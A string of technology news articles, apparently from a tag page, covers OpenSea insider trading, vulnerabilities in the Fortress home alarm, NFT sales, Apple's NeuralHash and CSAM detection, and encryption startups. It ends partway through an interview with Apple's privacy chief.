OpenSea admits incident as top exec is accused of trading NFTs on insider information

The “eBay of NFTs” is running into a scandal as it admits one of its employees traded the crypto digital assets using insider information from the platform.

Yesterday, a top executive at NFT platform OpenSea was accused of front-running sales on the platform, purchasing pieces from NFT collections before they were featured on the homepage of the platform. According to Twitter user @ZuwuTV, the startup’s Head of Product was using secret crypto wallets to buy drops before they listed on the main page of OpenSea, selling them shortly after they were highlighted publicly by OpenSea, and funneling the profits back to his main account. Users linked to a handful of transactions from accounts linked back to the executive on the public blockchain including an NFT drop that was, at the time, actively listed on the front page of the platform.

Today, OpenSea seemed to acknowledge the incident, saying in a blog post that it had “learned that one of our employees purchased items that they knew were set to display on our front page before they appeared there publicly.” The company did not identify the employee but said that they were conducting an “immediate” review of the incident. The startup, which was recently valued at $1.5 billion after raising a $100 million Series B from Andreessen Horowitz, added in the unsigned blog post that this incident was “incredibly disappointing.”

“We’re conducting a thorough review of yesterday’s incident and are committed to doing the right thing for OpenSea users,” OpenSea CEO Devin Finzer said in a tweet.

OpenSea, which did a record $3.4 billion in transaction volume last month, appears not to have had any rules in places preventing employees from using confidential information to buy or sell NFTs on its own platform to its own users. The company detailed that it was now implementing a policy that team members could not buy or sell “from collections or creators while we are featuring or promoting them,” and that they are “prohibited from using confidential information to purchase or sell any NFTs, whether available on the OpenSea platform or not.”

Most NFTs are not generally assumed to be securities, despite little official guidance from the SEC on the crypto asset class. Some in the space have questioned whether different mechanics around buying and selling, alongside ongoing rewards structures may be pushing some NFT sales further into securities territory.

“Many have been enticed by dramatic jumps in the value of new digital assets,” Senate Banking Committee Chairman Sherrod Brown said in a hearing yesterday — as transcribed by The Block — where the relationship between crypto markets and SEC enforcement was discussed. “Some professional investors and celebrities make earning millions look easy. But, as we are reminded time and again, it’s never that simple – and too often, someone’s quick profit comes at the expense of workers and entire communities.”

We’ve reached out to OpenSea for further comment.

#andreessen-horowitz, #blockchains, #ceo, #chairman, #cryptocurrencies, #cryptocurrency, #cryptography, #distributed-computing, #ebay, #ethereum, #executive, #head, #opensea, #tc, #u-s-securities-and-exchange-commission

A popular smart home security system can be remotely disarmed, researchers say

A cybersecurity company says a popular smart home security system has a pair of vulnerabilities that can be exploited to disarm the system altogether.

Rapid7 found the vulnerabilities in the Fortress S03, a home security system that relies on Wi-Fi to connect cameras, motion sensors, and sirens to the internet, allowing owners to remotely monitor their home anywhere with a mobile app. The security system also uses a radio-controlled key fob to let homeowners arm or disarm their house from outside their front door.

But the cybersecurity company said the vulnerabilities include an unauthenticated API and an unencrypted radio signal that can be easily intercepted.

Rapid7 revealed details of the two vulnerabilities on Tuesday after not hearing from Fortress in three months, the standard window of time that security researchers give to companies to fix bugs before details are made public. Rapid7 said its only acknowledgment of its email was when Fortress closed its support ticket a week later without commenting.

Fortress owner Michael Hofeditz opened but did not respond to several emails sent by TechCrunch with an email open tracker. An email from Bottone Riling, a Massachusetts law firm representing Fortress, called the claims “false, purposely misleading and defamatory,” but did not provide specifics that it claims are false, or if Fortress has mitigated the vulnerabilities.

Rapid7 said that Fortress’ unauthenticated API can be remotely queried over the internet without the server checking if the request is legitimate. The researchers said by knowing a homeowner’s email address, the server would return the device’s unique IMEI, which in turn could be used to remotely disarm the system.

The other flaw takes advantage of the unencrypted radio signals sent between the security system and the homeowner’s key fob. That allowed Rapid7 to capture and replay the signals for “arm” and “disarm” because the radio waves weren’t scrambled properly.

Vishwakarma said homeowners could add a plus-tagged email address with a long, unique string of letters and numbers in place of a password as a stand-in for a password. But there was little for homeowners to do for the radio signal bug until Fortress addresses it.

Fortress has not said if it has fixed or plans to fix the vulnerabilities. It’s not clear if Fortress is able to fix the vulnerabilities without replacing the hardware. It’s not known if Fortress builds the device itself or buys the hardware from another manufacturer.

Read more:

#api, #computer-security, #cryptography, #cyberwarfare, #hacking, #law, #massachusetts, #password, #rapid7, #security, #software-testing, #vulnerability

CryptoPunks blasts past $1 billion in lifetime sales as NFT speculation surges

Hello friends, and welcome back to Week in Review! Last week we dove into Bezos’s Blue Origin suing NASA. This week, I’m writing about the unlikely and triumphant resurgence of the NFT market.

If you’re reading this on the TechCrunch site, you can get this in your inbox from the newsletter page, and follow my tweets @lucasmtny.


The big thing

If I could, I would probably write about NFTs in this newsletter every week. I generally stop myself from actually doing so because I try my best to make this newsletter a snapshot of what’s important to the entire consumer tech sector, not just my niche interests. That said, I’m giving myself free rein this week.

The NFT market is just so hilariously bizarre and the culture surrounding the NFT world is so web-native, I can’t read about it enough. But in the past several days, the market for digital art on the blockchain has completely defied reason.

Back in April, I wrote about a platform called CryptoPunks that — at that point — had banked more than $200 million in lifetime sales since 2017. The little pop art pixel portraits have taken on a life of their own since then. It was pretty much unthinkable back then but in the past 24 hours alone, the platform did $141 million in sales, a new record. By the time you read this, the NFT platform will have likely passed a mind-boggling $1.1 billion in transaction volume according to crypto tracker CryptoSlam. With 10,000 of these digital characters, to buy a single one will cost you at least $450,000 worth of the Ethereum cryptocurrency. (When I sent out this newsletter yesterday that number was $300k)

It’s not just CryptoPunks either; the entire NFT world has exploded in the past week, with several billions of dollars flowing into projects with drawings of monkeys, penguins, dinosaurs and generative art this month alone. After the NFT rally earlier this year — culminating in Beeple’s $69 million Christie’s sale — began to taper off, many wrote off the NFT explosion as a bizarre accident. What triggered this recent frenzy?

Part of it has been a resurgence of cryptocurrency prices toward all-time-highs and a desire among the crypto rich to diversify their stratospheric assets without converting their wealth to fiat currencies. Dumping hundreds of millions of dollars into an NFT project with fewer stakeholders than the currencies that underlie them can make a lot of sense to those whose wealth is already over-indexed in crypto. But a lot of this money is likely FOMO dollars from investors who are dumping real cash into NFTs, bolstered by moves like Visa’s purchase this week of their own CryptoPunk.

I think it’s pretty fair to say that this growth is unsustainable, but how much further along this market growth gets before the pace of investment slows or collapses is completely unknown. There are no signs of slowing down for now, something that can be awfully exciting — and dangerous — for investors looking for something wild to drop their money into… and wild this market truly is.

Here’s some advice from Figma CEO Dylan Field who sold his alien CryptoPunk earlier this year for 4,200 Eth (worth $13.6 million today).


Image Credits: Kanye West

Other things

Here are the TechCrunch news stories that especially caught my eye this week:

OnlyFans suspends its porn ban
In a stunning about-face, OnlyFans declared this week that they won’t be banning “sexually explicit content” from their platform after all, saying in a statement that they had “secured assurances necessary to support our diverse creator community and have suspended the planned October 1 policy change.”

Kanye gets into the hardware business
Ahead of the drop of his next album, which will definitely be released at some point, rapper Kanye West has shown off a mobile music hardware device called the Stem Player. The $200 pocket-sized device allows users to mix and alter music that has been loaded onto the device. It was developed in partnership with hardware maker Kano.

Apple settles developer lawsuit
Apple has taken some PR hits in recent years following big and small developers alike complaining about the take-it-or-leave-it terms of the company’s App Store. This week, Apple shared a proposed settlement (which still is pending a judge’s approval) that starts with a $100 million payout and gets more interesting with adjustments to App Store bylines, including the ability of developers to advertise paying for subscriptions directly rather than through the app only.

Twitter starts rolling out ticketed Spaces
Twitter has made a convincing sell for its Clubhouse competitor Spaces, but they’ve also managed to build on the model in recent months, turning its copycat feature into a product that succeeds on its own merits. Its latest effort to allow creators to sell tickets to events is just starting to roll out, the company shared this week.

CA judge strikes down controversial gig economy proposition
Companies like Uber and DoorDash dumped tens of millions of dollars into Prop 22, a law which clawed back a California law that pushed gig economy startups to classify workers as full employees. This week a judge declared the proposition unconstitutional, and though the decision has been stayed on appeal, any adjustment would have major ramifications for those companies’ business in California.


Image of a dollar sign representing the future value of cybersecurity.

Image Credits: guirong hao (opens in a new window) / Getty Images

Extra things

Some of my favorite reads from our Extra Crunch subscription service this week:

Future tech exits have a lot to live up to
“Inflation may or may not prove transitory when it comes to consumer prices, but startup valuations are definitely rising — and noticeably so — in recent quarters. That’s the obvious takeaway from a recent PitchBook report digging into valuation data from a host of startup funding events in the United States…”

OpenSea UX teardown
“…is the experience of creating and selling an NFT on OpenSea actually any good? That’s what UX analyst Peter Ramsey has been trying to answer by creating and selling NFTs on OpenSea for the last few weeks. And the short answer is: It could be much better...

Are B2B SaaS marketers getting it wrong?
“‘Solutions,’ ‘cutting-edge,’ ‘scalable’ and ‘innovative’ are just a sample of the overused jargon lurking around every corner of the techverse, with SaaS marketers the world over seemingly singing from the same hymn book. Sadly for them, new research has proven that such jargon-heavy copy — along with unclear features and benefits — is deterring customers and cutting down conversions…”


Thanks for reading! And again, if you’re reading this on the TechCrunch site, you can get this in your inbox from the newsletter page, and follow my tweets @lucasmtny.

Lucas Matney

#analyst, #app-store, #apple, #bezos, #blockchain, #blockchains, #blue-origin, #california, #ceo, #cryptocurrencies, #cryptocurrency, #cryptography, #distributed-computing, #doordash, #dylan-field, #ethereum, #extra-crunch, #figma, #judge, #kano, #kanye-west, #lucas-matney, #onlyfans, #peter-ramsey, #uber, #united-states

Apple’s CSAM detection tech is under fire — again

Apple has encountered monumental backlash to a new child sexual abuse imagery (CSAM) detection technology it announced earlier this month. The system, which Apple calls NeuralHash, has yet to be activated for its billion-plus users, but the technology is already facing heat from security researchers who say the algorithm is producing flawed results.

NeuralHash is designed to identify known CSAM on a user’s device without having to possess the image or knowing the contents of the image. Because a user’s photos stored in iCloud are end-to-end encrypted so that even Apple can’t access the data, NeuralHash instead scans for known CSAM on a user’s device, which Apple claims is more privacy friendly as it limits the scanning to just photos rather than other companies which scan all of a user’s file.

Apple does this by looking for images on a user’s device that have the same hash — a string of letters and numbers that can uniquely identify an image — that are provided by child protection organizations like NCMEC. If NeuralHash finds 30 or more matching hashes, the images are flagged to Apple for a manual review before the account owner is reported to law enforcement. Apple says the chance of a false positive is about one in one trillion accounts.

But security experts and privacy advocates have expressed concern that the system could be abused by highly-resourced actors, like governments, to implicate innocent victims or to manipulate the system to detect other materials that authoritarian nation states find objectionable. NCMEC called critics the “screeching voices of the minority,” according to a leaked memo distributed internally to Apple staff.

Last night, Asuhariet Ygvar reverse-engineered Apple’s NeuralHash into a Python script and published code to GitHub, allowing anyone to test the technology regardless of whether they have an Apple device to test. In a Reddit post, Ygvar said NeuralHash “already exists” in iOS 14.3 as obfuscated code, but was able to reconstruct the technology to help other security researchers understand the algorithm better before it’s rolled out to iOS and macOS devices later this year.

It didn’t take long before others tinkered with the published code and soon came the first reported case of a “hash collision,” which in NeuralHash’s case is where two entirely different images produce the same hash. Cory Cornelius, a well-known research scientist at Intel Labs, discovered the hash collision. Ygvar confirmed the collision a short time later.

Hash collisions can be a death knell to systems that rely on cryptography to keep them secure, such as encryption. Over the years several well-known password hashing algorithms, like MD5 and SHA-1, were retired after collision attacks rendered them ineffective.

Kenneth White, a cryptography expert and founder of the Open Crypto Audit Project, said in a tweet: “I think some people aren’t grasping that the time between the iOS NeuralHash code being found and [the] first collision was not months or days, but a couple of hours.”

When reached, an Apple spokesperson declined to comment on the record. But in a background call where reporters were not allowed to quote executives directly or by name, Apple downplayed the hash collision and argued that the protections it puts in place — such as a manual review of photos before they are reported to law enforcement — are designed to prevent abuses. Apple also said that the version of NeuralHash that was reverse-engineered is a generic version, and not the complete version that will roll out later this year.

It’s not just civil liberties groups and security experts that are expressing concern about the technology. A senior lawmaker in the German parliament sent a letter to Apple chief executive Tim Cook this week saying that the company is walking down a “dangerous path” and urged Apple not to implement the system.

#algorithms, #apple, #apple-inc, #cryptography, #encryption, #github, #hash, #icloud, #law-enforcement, #password, #privacy, #python, #security, #sha-1, #spokesperson, #tim-cook

Evervault’s ‘encryption as a service’ is now open access

Dublin-based Evervault, a developer-focused security startup which sells encryption vis API and is backed by a raft of big name investors including the likes of Sequoia, Kleiner Perkins and Index Ventures, is coming out of closed beta today — announcing open access to its encryption engine.

The startup says some 3,000 developers are on its waitlist to kick the tyres of its encryption engine, which it calls E3.

Among “dozens” of companies in its closed preview are drone delivery firm Manna, fintech startup Okra, and healthtech company Vital. Evervault says it’s targeting its tools at developers at companies with a core business need to collect and process four types of data: Identity & contact data; Financial & transaction data; Health & medical data; and Intellectual property.

The first suite of products it offers on E3 are called Relay and Cages; the former providing a new way for developers to encrypt and decrypt data as it passes in and out of apps; the latter offering a secure method — using trusted execution environments running on AWS — to process encrypted data by isolating the code that processes plaintext data from the rest of the developer stack.

Evervault is the first company to get a product deployed on Amazon Web Services’ Nitro Enclaves, per founder Shane Curran.

“Nitro Enclaves are basically environments where you can run code and prove that the code that’s running in the data itself is the code that you’re meant to be running,” he tells TechCrunch. “We were the first production deployment of a product on AWS Nitro Enclaves — so in terms of the people actually taking that approach we’re the only ones.”

It shouldn’t be news to anyone to say that data breaches continue to be a serious problem online. And unfortunately it’s sloppy security practices by app makers — or even a total lack of attention to securing user data — that’s frequently to blame when plaintext data leaks or is improperly accessed.

Evervault’s fix for this unfortunate ‘feature’ of the app ecosystem is to make it super simple for developers to bake in encryption via an API — taking the strain of tasks like managing encryption keys. (“Integrate Evervault in 5 minutes by changing a DNS record and including our SDK,” is the developer-enticing pitch on its website.)

“At the high level what we’re doing… is we’re really focusing on getting companies from [a position of] not approaching security and privacy from any perspective at all — up and running with encryption so that they can actually, at the very least, start to implement the controls,” says Curran.

“One of the biggest problems that companies have these days is they basically collect data and the data sort of gets sprawled across both their implementation and their test sets as well. The benefit of encryption is that  you know exactly when data was accessed and how it was accessed. So it just gives people a platform to see what’s happening with the data and start implementing those controls themselves.”

With C-Suite executives paying increasing mind to the need to properly secure data — thanks to years of horrific data breach scandals (and breach déjà vu), and also because of updated data protection laws like Europe’s General Data Protection Regulation (GDPR) which has beefed up penalties for lax security and data misuse — a growing number of startups are now pitching services that promise to deliver ‘data privacy’, touting tools they claim will protect data while still enabling developers to extract useful intel.

Evervault’s website also deploys the term “data privacy” — which it tells us it defines to mean that “no unauthorized party has access to plaintext user/customer data; users/customers and authorized developers have full control over who has access to data (including when and for what purpose); and, plaintext data breaches are ended”. (So encrypted data could, in theory, still leak — but the point is the information would remain protected as a result of still being robustly encrypted.)

Among a number of techniques being commercialized by startups in this space is homomorphic encryption — a process that allows for analysis of encrypted data without the need to decrypt the data.

Evervault’s first offering doesn’t go that far — although its ‘encryption manifesto‘ notes that it’s keeping a close eye on the technique. And Curran confirms it is likely to incorporate the approach in time. But he says its first focus has been to get E3 up and running with an offering that can help a broad swathe of developers.

“Fully homomorphic [encryption] is great. The biggest challenge if you’re targeting software developers who are building normal services it’s very hard to build general purpose applications on top of it. So we take another approach — which is basically using trusted execution environments. And we worked with the Amazon Web Services team on being their first production deployment of their new product called Nitro Enclaves,” he tells TechCrunch.

“The bigger focus for us is less about the underlying technology itself and it’s more about taking what the best security practices are for companies that are already investing heavily in this and just making them accessible to average developers who don’t even know how encryption works,” Curran continues. “That’s where we get the biggest nuance of Evervault vs some of these others privacy and security companies — we build for developers who don’t normally think about security when they’re building things and try to build a great experience around that… so it’s really just about bridging the gap between ‘the start of art’ and bringing it to average developers.”

“Over time fully homomorphic encryption is probably a no-brainer for us but both in terms of performance and flexibility for your average developer to get up and running it didn’t really make sense for us to build on it in its current form. But it’s something we’re looking into. We’re really looking at what’s coming out of academia — and if we can fit it in there. But in the meantime it’s all this trusted execution environment,” he adds.

Curran suggests Evervault’s main competitor at this point is open source encryption libraries — so basically developers opting to ‘do’ the encryption piece themselves. Hence it’s zeroing in on the service aspect of its offering; taking on encryption management tasks so developers don’t have to, while also reducing their security risk by ensuring they don’t have to touch data in the clear.

“When we’re looking at those sort of developers — who’re already starting to think about doing it themselves — the biggest differentiator with Evervault is, firstly the speed of integration, but more importantly it’s the management of encrypted data itself,” Curran suggests. “With Evervault we manage the keys but we don’t store any data and our customers store encrypted data but they don’t store keys. So it means that even if they want to encrypt something with Evervault they never have all the data themselves in plaintext — whereas with open source encryption they’ll have to have it at some point before they do the encryption. So that’s really the base competitor that we see.”

“Obviously there are some other projects out there — like Tim Berners-Lee’s Solid project and so on. But it’s not clear that there’s anybody else taking the developer-experience focused approach to encryption specifically. Obviously there’s a bunch of API security companies… but encryption through an API is something we haven’t really come across in the past with customers,” he adds.

While Evervault’s current approach sees app makers’ data hosted in dedicated trusted execution environments running on AWS, the information still exists there as plaintext — for now. But as encryption continues to evolves it’s possible to envisage a future where apps aren’t just encrypted by default (Evervault’s stated mission is to “encrypt the web”) but where user data, once ingested and encrypted, never needs to be decrypted — as all processing can be carried out on ciphertext.

Homomorphic encryption has unsurprisingly been called the ‘holy grail’ of security and privacy — and startups like Duality are busy chasing it. But the reality on the ground, online and in app stores, remains a whole lot more rudimentary. So Evervault sees plenty of value in getting on with trying to raise the encryption bar more generally.

Curran also points out that plenty of developers aren’t actually doing much processing of the data they gather — arguing therefore that caging plaintext data inside a trusted execution environment can thus abstract away a large part of the risk related to these sort of data flows anyway. “The reality is most developers who are building software these days aren’t necessarily processing data themselves,” he suggests. “They’re actually just sort of collecting it from their users and then sharing it with third party APIs.

“If you look at a startup building something with Stripe — the credit card flows through their systems but it always ends up being passed on somewhere else. I think that’s generally the direction that most startups are going these days. So you can trust the execution — depending on the security of the silicon in an Amazon data center kind of makes the most sense.”

On the regulatory side, the data protection story is a little more nuanced than the typical security startup spin.

While Europe’s GDPR certainly bakes security requirements into law, the flagship data protection regime also provides citizens with a suite of access rights attached to their personal data — a key element that’s often overlooked in developer-first discussions of ‘data privacy’.

Evervault concedes that data access rights haven’t been front of mind yet, with the team’s initial focus being squarely on encryption. But Curran tells us it plans — “over time” — to roll out products that will “simplify access rights as well”.

“In the future, Evervault will provide the following functionality: Encrypted data tagging (to, for example, time-lock data usage); programmatic role-based access (to, for example, prevent an employee seeing data in plaintext in a UI); and, programmatic compliance (e.g. data localization),” he further notes on that.

 

#api, #aws, #cryptography, #developer, #dublin, #encryption, #europe, #evervault, #general-data-protection-regulation, #homomorphic-encryption, #nitro-enclaves, #okra, #privacy, #security, #sequoia, #shane-curran, #tim-berners-lee

Insider hacks to streamline your SOC 3 certification application

If you’re a tech company offering anyone a service, somewhere in your future is a security assessment giving you the seal of approval to manage clients’ data and operate on your devices. No one takes security lightly anymore. The business costs of cyberattacks have now hit an all-time high. Government bodies, companies and consumers need the assurance that the next software they download isn’t going to be an open door for hackers.

For good reason, security certifications like the SOC 3 really put you through the wringer. My company, Waydev, has just attained the SOC 3 certification, becoming one of the first development analytics tools to receive that accreditation. We learned so much from the process, we felt it was right to share our experience with others that might be daunted by the prospect.

As a non-tech founder, it was hard not only to navigate the process, but to appreciate its value. But by putting our business caps on, our team was able to optimize our approach and minimize the time and effort needed to achieve our goal. In doing so, we were granted SOC 3 compliance in two weeks, as opposed to the two months it takes some companies.

We also turned the assessment into an opportunity to better our product, align our internal teams, boost our brand and even launch partnerships.

So here’s our advice on how teams can smoothly reach an SOC 3 while simultaneously balancing workloads and minimizing disruption to users.

First, bring your teams on board

Because we can’t expect employees to stack those hours on top of their regular workdays, as a leader you have to accept — and communicate — that the speed of your output will inevitably decrease.

As a founder, you’ll be acting as captain steering a ship into that SOC 3 port, and you’ll need all members of your crew to join forces. This isn’t a job for a specially designated security team alone and will require deep involvement from your development and other teams, too. That might lead to internal resistance, as they still have a full-time job tending to your product and customers.

That’s why it’s so important to start by being crystal clear with your employees about what this process will mean to their work lives. However, they have to embrace the true benefits that will arise. SOC 3 will immediately raise your brand’s appeal and likely see new customers come in as a result.

Each employee will also come out the other end with well-honed cybersecurity skills — they’ll have a deep understanding of potential cyber threats to the company, and all security initiatives will carry a far lighter burden. There’s also the sense of pride and fulfillment that comes with having an indisputable edge over your competitors.

#column, #computer-security, #cryptography, #cyberwarfare, #data-security, #ec-column, #ec-cybersecurity, #ec-how-to, #security, #security-tools, #startups

Baffle lands $20M Series B to simplify data-centric encryption

California-based Baffle, a startup that aims to prevent data breaches by keeping data encrypted from production through processing, has raised $20 million in Series B funding.

Baffle was founded in 2015 to help thwart the increasing threats to enterprise assets in public and private clouds. Unlike many solutions that only encrypt data in-transit and at-rest, Baffle’s solution keeps data encrypted while it’s being processed by databases and applications through a “security mesh” that de-identifies sensitive data that it claims offers no performance impact to customers.

The startup says its goal is to make data breaches “irrelevant” by efficiently encrypting data wherever it may be, so that even if there is a security breach, the data will be unavailable and unusable by hackers.

“Most encryption is misapplied, and quite frankly, doesn’t do anything to protect your data,” the startup claims. “The protection measures that are most commonly used do nothing to protect you against modern hacks and breaches.”

Baffle supports all major cloud platforms, including AWS, Google Cloud and Microsoft Azure, and it’s currently used to protect more than 100 billion records in financial services, healthcare, retail, industrial IoT, and government, according to the startup. The company claims it stores records belonging to the top 5 global financial services companies and five of the top 25 global companies.

“Securing IT infrastructure—networks, devices, databases, lakes and warehouses—is never complete. Constant change makes it impossible to adopt a zero trust security posture without protecting the data itself,” said Ameesh Divatia, co-founder and CEO of Baffle.

The startup’s Series B funding round, which comes more than three years after it secured closed $6M in Series A financing, was led by new investor Celesta Capital with contributions from National Grid Partners, Lytical Ventures and Nepenthe Capital, and brings the startup’s total funding to date to $36.5 million.

Baffle, which says it has seen threefold revenue growth over the past year, tells TechCrunch that the funds will be used to help it grow to meet market demand and to invest further in product development. It also plans to double its headcount from 25 to 50 employees over the next 12 months.

“With this investment, we can meet market demand for data-centric cloud data protection that enables responsible digital information sharing and breaks the cycle of continuous data and privacy breaches,” Divatia added.

Read more:

#cloud, #computer-security, #cryptography, #data-protection, #data-security, #encryption, #security

Interview: Apple’s Head of Privacy details child abuse detection and Messages safety features

Last week, Apple announced a series of new features targeted at child safety on its devices. Though not live yet, the features will arrive later this year for users. Though the goals of these features are universally accepted to be good ones — the protection of minors and the limit of the spread of Child Sexual Abuse Material (CSAM), there have been some questions about the methods Apple is using.

I spoke to Erik Neuenschwander, Head of Privacy at Apple, about the new features launching for its devices. He shared detailed answers to many of the concerns that people have about the features and talked at length to some of the tactical and strategic issues that could come up once this system rolls out. 

I also asked about the rollout of the features, which come closely intertwined but are really completely separate systems that have similar goals. To be specific, Apple is announcing three different things here, some of which are being confused with one another in coverage and in the minds of the public. 

CSAM detection in iCloud Photos – A detection system called NeuralHash creates identifiers it can compare with IDs from the National Center for Missing and Exploited Children and other entities to detect known CSAM content in iCloud Photo libraries. Most cloud providers already scan user libraries for this information — Apple’s system is different in that it does the matching on device rather than in the cloud.

Communication Safety in Messages – A feature that a parent opts to turn on for a minor on their iCloud Family account. It will alert children when an image they are going to view has been detected to be explicit and it tells them that it will also alert the parent.

Interventions in Siri and search – A feature that will intervene when a user tries to search for CSAM-related terms through Siri and search and will inform the user of the intervention and offer resources.

For more on all of these features you can read our articles linked above or Apple’s new FAQ that it posted this weekend.

From personal experience, I know that there are people who don’t understand the difference between those first two systems, or assume that there will be some possibility that they may come under scrutiny for innocent pictures of their own children that may trigger some filter. It’s led to confusion in what is already a complex rollout of announcements. These two systems are completely separate, of course, with CSAM detection looking for precise matches with content that is already known to organizations to be abuse imagery. Communication Safety in Messages takes place entirely on the device and reports nothing externally — it’s just there to flag to a child that they are or could be about to be viewing explicit images. This feature is opt-in by the parent and transparent to both parent and child that it is enabled.

Apple’s Communication Safety in Messages feature. Image Credits: Apple

There have also been questions about the on-device hashing of photos to create identifiers that can be compared with the database. Though NeuralHash is a technology that can be used for other kinds of features like faster search in photos, it’s not currently used for anything else on iPhone aside from CSAM detection. When iCloud Photos is disabled, the feature stops working completely. This offers an opt-out for people but at an admittedly steep cost given the convenience and integration of iCloud Photos with Apple’s operating systems.

Though this interview won’t answer every possible question related to these new features, this is the most extensive on-the-record discussion by Apple’s senior privacy member. It seems clear from Apple’s willingness to provide access and its ongoing FAQ’s and press briefings (there have been at least 3 so far and likely many more to come) that it feels that it has a good solution here. 

Despite the concerns and resistance, it seems as if it is willing to take as much time as is necessary to convince everyone of that. 

This interview has been lightly edited for clarity.

TC: Most other cloud providers have been scanning for CSAM for some time now. Apple has not. Obviously there are no current regulations that say that you must seek it out on your servers, but there is some roiling regulation in the EU and other countries. Is that the impetus for this? Basically, why now?

Erik Neuenschwander: Why now comes down to the fact that we’ve now got the technology that can balance strong child safety and user privacy. This is an area we’ve been looking at for some time, including current state of the art techniques which mostly involves scanning through entire contents of users libraries on cloud services that — as you point out — isn’t something that we’ve ever done; to look through user’s iCloud Photos. This system doesn’t change that either, it neither looks through data on the device, nor does it look through all photos in iCloud Photos. Instead what it does is gives us a new ability to identify accounts which are starting collections of known CSAM.

So the development of this new CSAM detection technology is the watershed that makes now the time to launch this. And Apple feels that it can do it in a way that it feels comfortable with and that is ‘good’ for your users?

That’s exactly right. We have two co-equal goals here. One is to improve child safety on the platform and the second is to preserve user privacy, And what we’ve been able to do across all three of the features, is bring together technologies that let us deliver on both of those goals.

Announcing the Communications safety in Messages features and the CSAM detection in iCloud Photos system at the same time seems to have created confusion about their capabilities and goals. Was it a good idea to announce them concurrently? And why were they announced concurrently, if they are separate systems?

Well, while they are [two] systems they are also of a piece along with our increased interventions that will be coming in Siri and search. As important as it is to identify collections of known CSAM where they are stored in Apple’s iCloud Photos service, It’s also important to try to get upstream of that already horrible situation. So CSAM detection means that there’s already known CSAM that has been through the reporting process, and is being shared widely re-victimizing children on top of the abuse that had to happen to create that material in the first place. for the creator of that material in the first place. And so to do that, I think is an important step, but it is also important to do things to intervene earlier on when people are beginning to enter into this problematic and harmful area, or if there are already abusers trying to groom or to bring children into situations where abuse can take place, and Communication Safety in Messages and our interventions in Siri and search actually strike at those parts of the process. So we’re really trying to disrupt the cycles that lead to CSAM that then ultimately might get detected by our system.

The process of Apple’s CSAM detection in iCloud Photos system. Image Credits: Apple

Governments and agencies worldwide are constantly pressuring all large organizations that have any sort of end-to-end or even partial encryption enabled for their users. They often lean on CSAM and possible terrorism activities as rationale to argue for backdoors or encryption defeat measures. Is launching the feature and this capability with on-device hash matching an effort to stave off those requests and say, look, we can provide you with the information that you require to track down and prevent CSAM activity — but without compromising a user’s privacy?

So, first, you talked about the device matching so I just want to underscore that the system as designed doesn’t reveal — in the way that people might traditionally think of a match — the result of the match to the device or, even if you consider the vouchers that the device creates, to Apple. Apple is unable to process individual vouchers; instead, all the properties of our system mean that it’s only once an account has accumulated a collection of vouchers associated with illegal, known CSAM images that we are able to learn anything about the user’s account. 

Now, why to do it is because, as you said, this is something that will provide that detection capability while preserving user privacy. We’re motivated by the need to do more for child safety across the digital ecosystem, and all three of our features, I think, take very positive steps in that direction. At the same time we’re going to leave privacy undisturbed for everyone not engaged in the illegal activity.

Does this, creating a framework to allow scanning and matching of on-device content, create a framework for outside law enforcement to counter with, ‘we can give you a list, we don’t want to look at all of the user’s data but we can give you a list of content that we’d like you to match’. And if you can match it with this content you can match it with other content we want to search for. How does it not undermine Apple’s current position of ‘hey, we can’t decrypt the user’s device, it’s encrypted, we don’t hold the key?’

It doesn’t change that one iota. The device is still encrypted, we still don’t hold the key, and the system is designed to function on on-device data. What we’ve designed has a device side component — and it has the device side component by the way, for privacy improvements. The alternative of just processing by going through and trying to evaluate users data on a server is actually more amenable to changes [without user knowledge], and less protective of user privacy.

Our system involves both an on-device component where the voucher is created, but nothing is learned, and a server-side component, which is where that voucher is sent along with data coming to Apple service and processed across the account to learn if there are collections of illegal CSAM. That means that it is a service feature. I understand that it’s a complex attribute that a feature of the service has a portion where the voucher is generated on the device, but again, nothing’s learned about the content on the device. The voucher generation is actually exactly what enables us not to have to begin processing all users’ content on our servers which we’ve never done for iCloud Photos. It’s those sorts of systems that I think are more troubling when it comes to the privacy properties — or how they could be changed without any user insight or knowledge to do things other than what they were designed to do.

One of the bigger queries about this system is that Apple has said that it will just refuse action if it is asked by a government or other agency to compromise by adding things that are not CSAM to the database to check for them on-device. There are some examples where Apple has had to comply with local law at the highest levels if it wants to operate there, China being an example. So how do we trust that Apple is going to hew to this rejection of interference If pressured or asked by a government to compromise the system?

Well first, that is launching only for US, iCloud accounts, and so the hypotheticals seem to bring up generic countries or other countries that aren’t the US when they speak in that way, and the therefore it seems to be the case that people agree US law doesn’t offer these kinds of capabilities to our government. 

But even in the case where we’re talking about some attempt to change the system, it has a number of protections built in that make it not very useful for trying to identify individuals holding specifically objectionable images. The hash list is built into the operating system, we have one global operating system and don’t have the ability to target updates to individual users and so hash lists will be shared by all users when the system is enabled. And secondly, the system requires the threshold of images to be exceeded so trying to seek out even a single image from a person’s device or set of people’s devices won’t work because the system simply does not provide any knowledge to Apple for single photos stored in our service. And then, thirdly, the system has built into it a stage of manual review where, if an account is flagged with a collection of illegal CSAM material, an Apple team will review that to make sure that it is a correct match of illegal CSAM material prior to making any referral to any external entity. And so the hypothetical requires jumping over a lot of hoops, including having Apple change its internal process to refer material that is not illegal, like known CSAM and that we don’t believe that there’s a basis on which people will be able to make that request in the US. And the last point that I would just add is that it does still preserve user choice, if a user does not like this kind of functionality, they can choose not to use iCloud Photos and if iCloud Photos is not enabled no part of the system is functional.

So if iCloud Photos is disabled, the system does not work, which is the public language in the FAQ. I just wanted to ask specifically, when you disable iCloud Photos, does this system continue to create hashes of your photos on device, or is it completely inactive at that point?

If users are not using iCloud Photos, NeuralHash will not run and will not generate any vouchers. CSAM detection is a neural hash being compared against a database of the known CSAM hashes that are part of the operating system image. None of that piece, nor any of the additional parts including the creation of the safety vouchers or the uploading of vouchers to iCloud Photos is functioning if you’re not using iCloud Photos. 

In recent years, Apple has often leaned into the fact that on-device processing preserves user privacy. And in nearly every previous case and I can think of that’s true. Scanning photos to identify their content and allow me to search them, for instance. I’d rather that be done locally and never sent to a server. However, in this case, it seems like there may actually be a sort of anti-effect in that you’re scanning locally, but for external use cases, rather than scanning for personal use — creating a ‘less trust’ scenario in the minds of some users. Add to this that every other cloud provider scans it on their servers and the question becomes why should this implementation being different from most others engender more trust in the user rather than less?

